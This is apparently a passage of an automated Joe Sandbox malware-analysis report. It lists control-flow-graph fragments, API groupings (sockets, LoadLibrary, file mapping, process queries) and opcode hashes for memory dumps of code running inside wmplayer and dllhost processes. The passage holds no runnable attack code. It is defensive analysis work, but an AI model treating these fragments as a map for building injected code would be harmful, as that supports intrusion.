                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2e710876b5b3087c0a7c6f9bccb089c58fd82b13e9e3ed8a9cb72cb9013f3709
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF09070215D0A4FEFD4EB6984D8F6633E4FF78368F601254A90AC61B5DB22CC82C741
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID: ($.$o
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-116743476
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b4de70949fda877a20c61ae92b35d789d351051bec86184ddb663cf619d5fe
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C181693094C7D44EF3A59B6885183EBBBE5EF56300F145B2ED0DF87292D6289545C713

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:2.9%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:140
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$QuerySystemVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2187445334-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b3a7ccf1a84848f62ff83896346a3ed7ba4f21d04a9b3def3ee624f6b9eeaff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17919F31218E094FE7A5EB24D8597FA73F1FB68311F100A3AE85BC71A1EE35D5418B81

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 08a355c566621220cf1199c51620232cf12c2660aca097f2e3aa5f504b216823
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6B13631319A094BE746EB28C4A1AEB73F1FB9C354F004629E88BCB196DE35E505CB91

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 552242919-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                                                                                                                                          • Instruction ID: 91f4f8932220efc395309eae06bd7a5f6f9d8d69fcf20e01fb6fd6919fb068fe
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A415170618B498FE748EF28D899AEA77F1FB99310F50862DE487C32A1DF399504CB51

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3452162329-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b27adf3c145ce8996aa4dcbea5fb1dcecf34d5f997913cd8e6e8376d7df9cea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD515F3161CB898BD725EB6488967FAB7F0FB99311F00452FE8DBC2191DE3495058B92

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0c68ab508b5cd1224362707b5eade2dda16dd4075a58e0b3546fe9670c6cd486
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79319C3030691A4FFBA89B28A8947F932E5FB5C325F5011B9EC0BC21D2DF35CD41A696

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: c1ef00e06c8d0f1cdf243a97787a41d64e88bbd409bbc49a264491ca82d45b22
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D513E7121C7858BD76AEF24C4956EBB7F1FB98311F400A3EE4CBC22A1DE7495058B42

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 225 1f269c72874-1f269c72891 call 1f269c71994 228 1f269c72898-1f269c7289e 225->228 229 1f269c72893-1f269c72896 LoadLibraryA 225->229 229->228
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 267 1f269c73dc4-1f269c73dd5 268 1f269c73dd7-1f269c73ddc 267->268 269 1f269c73df3-1f269c73df7 267->269 268->269 270 1f269c73dde-1f269c73de8 268->270 270->269 271 1f269c73dea-1f269c73ded free 270->271 271->269
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0